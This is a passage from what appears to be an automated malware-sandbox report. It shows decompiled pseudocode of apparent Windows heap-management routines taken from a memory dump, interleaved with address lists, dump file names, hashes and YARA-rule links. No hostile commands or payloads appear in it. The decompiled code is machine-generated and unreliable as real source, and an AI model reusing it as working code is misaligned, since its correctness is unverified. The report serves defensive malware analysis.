											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
												_t118 = _t116 + 0x10;
												__eflags = _t118 & 0x00000fff;
												if((_t118 & 0x00000fff) == 0) {
													_t148 = _t118;
													_t140 = _t140 - 8;
													__eflags = _t140;
												}
											}
											_t117 = _v40;
											_t124 =  *_t145;
											__eflags = _t117 - _t140;
											if(_t117 >= _t140) {
												_t125 = _t124 & 0xfffffeff;
												__eflags = _t125;
												 *_t145 = _t125;
											} else {
												_t126 = _t124 | 0x00000100;
												_push(_t126);
												 *_t145 = _t126;
												E1E472506(_t148, _t140, _t140 - _t117);
												_t85 = _v20;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												E1E3BFFB0(_t117, _t145, _t85);
											}
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												E1E3EFA60(_t148, 0, _t117);
											}
											goto L42;
										}
										_push(_t122);
										_push(0);
										E1E46A80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
										goto L39;
									}
									_t137 = _t116 - (_t71 << 3);
									_t95 =  *_t137 ^ _t122 ^ _t137;
									__eflags = _t95;
									if(_t95 < 0) {
										L34:
										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
										__eflags = _t98;
										L35:
										_t72 = _t98 & 0x000000ff;
										goto L37;
									}
									_t100 = _t95 >> 0x00000010 & 0x00007fff;
									__eflags = _t100;
									if(_t100 == 0) {
										goto L36;
									}
									_t137 = _t137 + _t100 * 0xfffffff8;
									__eflags = _t137;
									goto L34;
								}
								_t98 =  *_t145 ^ _t122 ^ _t116;
								goto L35;
							}
							if(_t136 == 0) {
								E1E3BFFB0(_t115, _t145, _t147);
							}
							_t104 = E1E473149(_t147, _t115, _a8);
							_t146 = _t104;
							if(_t104 == 0) {
								goto L41;
							} else {
								if(_v12 == 0) {
									E1E3C2280(_t104, _t147);
								}
								_v5 = 0xff;
								E1E472876(_t147, _t146);
								_t136 = _v12;
								goto L7;
							}
						}
						_t113 =  *(_t145 + 4);
						if(_v24 == 0 || _t113 == 0) {
							_t121 = _v16;
							goto L15;
						} else {
							_t121 = _v16;
							_t145 = _t145 ^ _t113;
						}
						L16:
					} while (_t145 != 0);
					L17:
					_t145 = _t121;
					goto L18;
				}
			}

0x1e4728f5
0x1e4728fa
0x1e4728fe
0x1e472900
0x1e472906
0x1e472908
0x1e472908
0x1e47290e
0x1e472915
0x1e472918
0x1e47291b
0x1e47291d
0x1e472920
0x1e472920
0x1e472929
0x1e47292c
0x1e47292f
0x1e472932
0x1e472935
0x1e472938
0x1e47293d
0x1e47293d
0x1e472940
0x1e472944
0x1e472944
0x1e472948
0x1e47294a
0x1e472950
0x1e472953
0x1e472958
0x00000000
0x00000000
0x1e47295a
0x1e472962
0x1e472965
0x1e472976
0x1e472978
0x1e4729e0
0x1e4729e4
0x1e4729e6
0x1e4729e8
0x1e4729eb
0x1e472993
0x1e472993
0x00000000
0x1e472993
0x1e4729ed
0x1e4729ef
0x00000000
0x00000000
0x1e4729f1
0x00000000
0x1e4729f1
0x1e47297a
0x1e47299b
0x1e47299d
0x1e4729f5
0x1e4729fb
0x1e4729fb
0x1e472a00
0x1e472a04
0x1e472a04
0x1e472a06
0x1e472a13
0x1e472a13
0x1e472a18
0x1e472a44
0x1e472a44
0x1e472a44
0x1e472a46
0x1e472a50
0x1e472a5a
0x1e472a5e
0x1e472a99
0x1e472a9e
0x1e472aa0
0x1e472a70
0x1e472a70
0x1e472a72
0x1e472a75
0x1e472a82
0x1e472a89
0x1e472a89
0x1e472a7a
0x1e472a7f
0x1e472a7f
0x1e472a7f
0x00000000
0x1e472a7f
0x1e472aa4
0x1e472aa4
0x1e472ab6
0x1e472abd
0x1e472ac0
0x1e472ac4
0x1e472ac6
0x1e472ac9
0x1e472acf
0x1e472ad1
0x1e472ad3
0x1e472ad3
0x1e472ad3
0x1e472acf
0x1e472ad6
0x1e472ad9
0x1e472adb
0x1e472add
0x1e472af9
0x1e472af9
0x1e472aff
0x1e472adf
0x1e472adf
0x1e472ae7
0x1e472aea
0x1e472aef
0x1e472af4
0x1e472af4
0x1e472b01
0x1e472b05
0x1e472b08
0x1e472b08
0x1e472b0d
0x1e472b11
0x1e472b1b
0x1e472b20
0x00000000
0x1e472b11
0x1e472a60
0x1e472a61
0x1e472a6b
0x00000000
0x1e472a6b
0x1e472a1f
0x1e472a25
0x1e472a25
0x1e472a27
0x1e472a38
0x1e472a3d
0x1e472a3d
0x1e472a3f
0x1e472a3f
0x00000000
0x1e472a3f
0x1e472a2c
0x1e472a2c
0x1e472a31
0x00000000
0x00000000
0x1e472a36
0x1e472a36
0x00000000
0x1e472a36
0x1e472a0c
0x00000000
0x1e472a0c
0x1e4729a1
0x1e4729a4
0x1e4729a4
0x1e4729b0
0x1e4729b5
0x1e4729b9
0x00000000
0x1e4729bf
0x1e4729c3
0x1e4729c6
0x1e4729c6
0x1e4729cd
0x1e4729d3
0x1e4729d8
0x00000000
0x1e4729d8
0x1e4729b9
0x1e472980
0x1e472983
0x1e472990
0x00000000
0x1e472989
0x1e472989
0x1e47298c
0x1e47298c
0x1e472995
0x1e472995
0x1e472999
0x1e472999
0x00000000
0x1e472999

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b61ca7a45da90c60e8c24553702d389ee6f438db9d4b94096d80c50b4ecb0a
Instruction ID: 487ae3a326a3f9284b47407f2edf178ee2eea7623de9c15275aadf1598464731
Opcode Fuzzy Hash: 86b61ca7a45da90c60e8c24553702d389ee6f438db9d4b94096d80c50b4ecb0a
Instruction Fuzzy Hash: 0B71F5B1E1051A9BCB04CF69C8806EEB7E6EF88710F158B6AD855D7384DB34E941CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D138B, Relevance: .2, Instructions: 206
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E1E3D138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E1E3D0678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E1E3E9660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E1E3C7D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E1E46138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E1E3D16C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						E1E46A80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E1E3CB73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E1E3CA830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					E1E46A80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}

0x1e3d139f
0x1e3d13a1
0x1e3d13a4
0x1e3d13a6
0x1e3d13ab
0x1e3d13b3
0x1e415522
0x00000000
0x1e415522
0x1e3d13b9
0x1e3d13c1
0x1e3d13c4
0x1e3d13cd
0x1e3d13d0
0x1e3d13d9
0x1e3d13dc
0x1e3d13df
0x1e3d13e4
0x1e41552b
0x00000000
0x00000000
0x1e415534
0x1e41553f
0x1e415545
0x1e415549
0x1e41554a
0x1e41554f
0x1e415550
0x1e415559
0x1e41551c
0x00000000
0x1e41551c
0x1e415562
0x1e415574
0x1e415564
0x1e41556d
0x1e41556d
0x1e41557c
0x1e415597
0x1e415597
0x1e41559f
0x1e4155a2
0x1e4155a5
0x1e4155a5
0x1e3d13ec
0x1e3d13f2
0x1e3d13f4
0x1e3d13f8
0x1e3d13fe
0x1e3d1400
0x1e3d1406
0x1e3d1412
0x1e3d1419
0x1e4155b0
0x1e4155b5
0x1e4155b8
0x1e4155b8
0x1e3d1425
0x1e3d1429
0x1e3d142c
0x1e3d142f
0x1e3d1432
0x1e3d1435
0x1e3d143a
0x1e3d143d
0x1e3d1443
0x1e3d1446
0x1e3d1449
0x1e3d1450
0x1e3d1453
0x1e3d1459
0x1e3d145f
0x1e3d1462
0x1e3d1467
0x1e3d14fa
0x1e3d146d
0x1e3d146d
0x1e3d146d
0x1e3d146f
0x1e3d1479
0x1e3d1480
0x1e3d1507
0x1e3d1508
0x1e3d1510
0x1e4155c1
0x1e4155c2
0x1e4155cc
0x1e4155d1
0x1e4155d4
0x1e4155d7
0x1e4155d7
0x1e3d1482
0x1e3d1482
0x1e3d1482
0x1e3d1484
0x1e3d149b
0x1e3d14a4
0x1e3d14ae
0x1e3d14b4
0x1e3d14b4
0x1e3d14ba
0x1e3d14c4
0x1e3d14c4
0x1e3d14c9
0x1e3d14cf
0x1e3d14d2
0x1e3d14d7
0x1e4155df
0x1e4155e0
0x1e4155ea
0x1e3d14dd
0x1e3d14dd
0x1e3d14df
0x1e3d14e2
0x1e3d14e4
0x1e3d14e4
0x1e3d14e7
0x00000000

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction ID: 697eaf14f1ab6092699f344fcf934e6fc611ac190eca67ae5d2f7a85367f5aba
Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
Instruction Fuzzy Hash: DB817975A007459FCB15CF69C480B9ABBF6FF48300F148A6AE856C7751D334EA85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E461002, Relevance: .2, Instructions: 198
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1E461002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x1e495898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x1e4958b0 = _t128;
								 *0x1e4958b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x1e4958b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x1e4958bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x1e4958bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x1e4958b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x1e495898 = 7;
										return _t75;
									} else {
										 *0x1e495898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x1e495898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}

0x1e461002
0x1e46100c
0x1e46100f
0x1e461012
0x1e461018
0x00000000
0x1e46102e
0x1e461030
0x00000000
0x1e461032
0x1e461032
0x1e461038
0x1e461038
0x1e46121e
0x1e4611ff
0x1e461205
0x1e461207
0x1e46120c
0x1e46120e
0x1e461210
0x1e461212
0x1e461212
0x1e461210
0x1e46121c
0x1e46121c
0x1e461228
0x1e461228
0x1e46101c
0x1e46101c
0x1e46101c
0x1e46101f
0x1e461022
0x1e461025
0x1e46102c
0x1e46102c
0x00000000
0x1e46102c
0x1e461027
0x1e46102a
0x1e46103f
0x1e46103f
0x1e461042
0x1e461044
0x1e461047
0x1e461049
0x1e46104c
0x1e46104e
0x1e461088
0x1e461088
0x1e46108a
0x1e46108d
0x1e46108f
0x1e461091
0x1e461091
0x1e461093
0x1e461095
0x1e461097
0x1e4610c8
0x1e4610cb
0x1e4610ce
0x1e4610d0
0x1e4610f4
0x1e4610f4
0x1e4610fa
0x1e461100
0x1e461102
0x1e461150
0x1e461150
0x1e461154
0x1e461167
0x1e46116a
0x1e46116a
0x1e461156
0x1e461156
0x1e461158
0x1e46115b
0x1e46115d
0x1e46115f
0x1e46115f
0x1e46115f
0x1e461162
0x1e461162
0x1e46116c
0x1e46116f
0x1e461171
0x1e46117b
0x1e46117b
0x1e46117d
0x1e461183
0x1e461183
0x1e461186
0x1e461188
0x1e461199
0x1e46118a
0x1e46118a
0x1e46118c
0x1e46118f
0x1e461191
0x1e461191
0x1e461191
0x1e461194
0x1e461194
0x1e46119c
0x1e4611a2
0x1e4611a8
0x1e4611ac
0x1e4611af
0x1e4611c7
0x1e4611b1
0x1e4611b1
0x1e4611b4
0x1e4611b7
0x1e4611b9
0x1e4611b9
0x1e4611b9
0x1e4611bc
0x1e4611c2
0x1e4611c2
0x1e4611cb
0x1e4611ce
0x1e4611d4
0x1e4611e7
0x1e4611ed
0x1e4611ef
0x00000000
0x00000000
0x1e4611f1
0x00000000
0x1e4611d6
0x1e4611d6
0x00000000
0x1e4611d6
0x1e4611d4
0x1e461104
0x1e461106
0x00000000
0x00000000
0x1e461108
0x1e46110c
0x1e46111d
0x1e46110e
0x1e46110e
0x1e461110
0x1e461113
0x1e461115
0x1e461115
0x1e461115
0x1e461118
0x1e461118
0x1e461126
0x1e46113a
0x1e46113d
0x1e46113f
0x00000000
0x1e461141
0x1e461141
0x00000000
0x1e461141
0x1e46113f
0x1e4610d6
0x1e4610d9
0x1e4610dd
0x1e4610e3
0x1e4610e6
0x1e4610e9
0x00000000
0x00000000
0x1e4610ee
0x1e4610f0
0x1e4610f2
0x00000000
0x00000000
0x00000000
0x1e4610f2
0x00000000
0x1e461099
0x1e461099
0x1e46109c
0x1e46109c
0x1e46109e
0x1e4610a0
0x1e4610b3
0x1e4610a2
0x1e4610a2
0x1e4610a4
0x1e4610a7
0x1e4610a9
0x1e4610ab
0x1e4610ab
0x1e4610ab
0x1e4610ae
0x1e4610ae
0x1e4610b6
0x1e4610b9
0x00000000
0x00000000
0x1e4610be
0x1e4610c1
0x1e4610c3
0x00000000
0x00000000
0x00000000
0x1e4610c3
0x1e4610c5
0x00000000
0x1e4610c5
0x1e461097
0x1e461050
0x1e461053
0x1e461056
0x1e461059
0x1e46105c
0x1e46105e
0x1e461060
0x1e461062
0x1e461064
0x1e461064
0x1e461062
0x1e461066
0x1e461069
0x1e46106b
0x1e46106d
0x1e46106f
0x1e461076
0x1e461076
0x1e461076
0x00000000
0x1e461076
0x1e461071
0x1e461074
0x00000000
0x00000000
0x00000000
0x1e461074
0x1e461079
0x1e461079
0x1e46107b
0x1e46107b
0x1e46107f
0x1e461082
0x1e461085
0x00000000
0x1e461085
0x00000000

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d46e3f13d84df42ceb08b36fabe2cc6a014385cb28faf3b70c402f637ba721c2
Instruction ID: ea071a5036fc68939154c9578114b325cb73a282f3fa86f96ecccd2a53f15d61
Opcode Fuzzy Hash: d46e3f13d84df42ceb08b36fabe2cc6a014385cb28faf3b70c402f637ba721c2
Instruction Fuzzy Hash: A8716A74A00662CBCF18CF66D49067AB3F2FB4C301B614A6FD98A97740D779E951CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E44CB4F, Relevance: .2, Instructions: 171
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E1E44CB4F(signed int __ecx) {
				signed int _v8;
				unsigned int* _v12;
				intOrPtr* _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				signed int _t57;
				signed int _t61;
				signed int _t63;
				intOrPtr* _t79;
				unsigned int* _t80;
				signed int _t82;
				signed int* _t84;
				signed char _t88;
				signed char _t93;
				signed int _t100;
				signed int _t103;
				signed short _t104;
				unsigned int _t107;
				unsigned int _t111;
				signed int _t114;
				signed short* _t115;
				void* _t118;
				signed short* _t119;
				signed int _t120;

				_t120 = __ecx;
				_v12 = 0;
				_t118 = __ecx + 0xc0;
				_t79 =  *((intOrPtr*)(_t118 + 4));
				if(_t118 == _t79) {
					_t80 = 0;
					L38:
					return _t80;
				} else {
					goto L1;
				}
				do {
					L1:
					_t119 = _t79 - 8;
					_v16 = _t79;
					if( *(_t120 + 0x4c) != 0) {
						_t107 =  *(_t120 + 0x50) ^  *_t119;
						 *_t119 = _t107;
						_t88 = _t107 >> 0x00000010 ^ _t107 >> 0x00000008 ^ _t107;
						_t123 = _t107 >> 0x18 - _t88;
						if(_t107 >> 0x18 != _t88) {
							E1E45FA2B(_t79, _t120, _t119, _t119, _t120, _t123, _t88);
						}
					}
					_t82 =  *_t119 & 0x0000ffff;
					_t79 =  *_t79;
					_v20 = _t82;
					_v8 = _t82;
					if((_t119[1] & 0x00000008) == 0) {
						_t84 = E1E3C99BF(_t120, _t119,  &_v8, 1);
						__eflags = _v8 - _v20;
						if(_v8 == _v20) {
							_t103 = _v12;
							__eflags = _t103;
							if(_t103 == 0) {
								L29:
								_v12 = _t84;
								L30:
								__eflags =  *(_t120 + 0x4c);
								if(__eflags != 0) {
									_t84[0] = _t84[0] ^ _t84[0] ^  *_t84;
									 *_t84 =  *_t84 ^  *(_t120 + 0x50);
									__eflags =  *_t84;
								}
								goto L32;
							}
							__eflags =  *_t103 -  *_t84;
							if( *_t103 >=  *_t84) {
								goto L30;
							}
							goto L29;
						}
						__eflags = _t84 - _t119;
						if(_t84 == _t119) {
							L24:
							_push(1);
							_push(_v8);
							_t115 = _t84;
							L25:
							E1E3CA309(_t120, _t115);
							L26:
							_t79 =  *((intOrPtr*)(_t120 + 0xc4));
							goto L32;
						}
						__eflags =  *_t84 - 0x200;
						if( *_t84 < 0x200) {
							L23:
							E1E3CA830(_t120, _t84, _v8);
							goto L26;
						}
						__eflags =  *((intOrPtr*)(_t120 + 0x54)) - _t84[1];
						if( *((intOrPtr*)(_t120 + 0x54)) == _t84[1]) {
							goto L24;
						}
						goto L23;
					}
					_t104 = _t119[6];
					_t55 =  *(_t79 + 4);
					_v8 = _t104;
					if( *_t104 != _t55) {
						L18:
						_push(_t82);
						_push( *_t104);
						E1E46A80D(_t120, 0xd, _v16, _t55);
						goto L26;
					}
					_t82 = _v20;
					if( *_t104 != _v16) {
						goto L18;
					}
					 *((intOrPtr*)(_t120 + 0x74)) =  *((intOrPtr*)(_t120 + 0x74)) - _t82;
					_t114 =  *(_t120 + 0xb4);
					if(_t114 == 0) {
						L14:
						_t57 = _v8;
						 *_t57 = _t79;
						 *(_t79 + 4) = _t57;
						if((_t119[1] & 0x00000008) != 0) {
							E1E3CA229(_t120, _t119);
						}
						_t115 = _t119;
						_push(1);
						_push( *_t119 & 0x0000ffff);
						goto L25;
					}
					_t100 =  *_t119 & 0x0000ffff;
					while(_t100 >=  *((intOrPtr*)(_t114 + 4))) {
						_t61 =  *_t114;
						__eflags = _t61;
						if(_t61 == 0) {
							_t63 =  *((intOrPtr*)(_t114 + 4)) - 1;
							L13:
							E1E3CBC04(_t120, _t114, 1, _v16, _t63, _t100);
							goto L14;
						}
						_t114 = _t61;
					}
					_t63 = _t100;
					goto L13;
					L32:
				} while (_t120 + 0xc0 != _t79);
				_t80 = _v12;
				if(_t80 != 0 &&  *(_t120 + 0x4c) != 0) {
